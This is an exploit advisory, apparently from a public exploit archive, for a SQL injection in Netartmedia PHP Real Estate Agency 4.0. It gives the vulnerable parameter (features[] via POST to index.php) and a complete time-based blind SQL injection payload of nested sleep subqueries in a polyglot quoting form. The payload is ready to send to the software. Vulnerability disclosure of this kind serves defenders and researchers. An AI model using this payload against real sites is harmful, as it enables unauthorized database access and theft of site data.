# Exploit Title: Netartmedia PHP Real Estate Agency 4.0 - SQL Injection# Date: 19.03.2019# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.netartmedia.net/propertyagency/# Demo Site: https://www.phpscriptdemos.com/agency/# Version: 4.0# Tested on: Kali Linux# CVE: N/A# Description:PHP Real Estate Agency is a web software written in PHP
especially designed for real estate agencies to help create quickly
and launch their own websites with their listings and information on
it.----- PoC SQLi -----
Request: http://localhost/[PATH]/index.php
Parameter: features[](POST)
Payload: ad_type=&bathrooms=&bedrooms=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&field_location=1&listing_type=&location=&mod=search&only_pictures=1&order_by=date&pfield51_0=1&pfield51_1=1&pfield51_2=1&price_from=1&price_to=1&search_keyword=&search_type=search_form&size_from=1&size_to=1&type=1&zip=94102&zip_distance=94102&zip_radius=1&zip_type=1
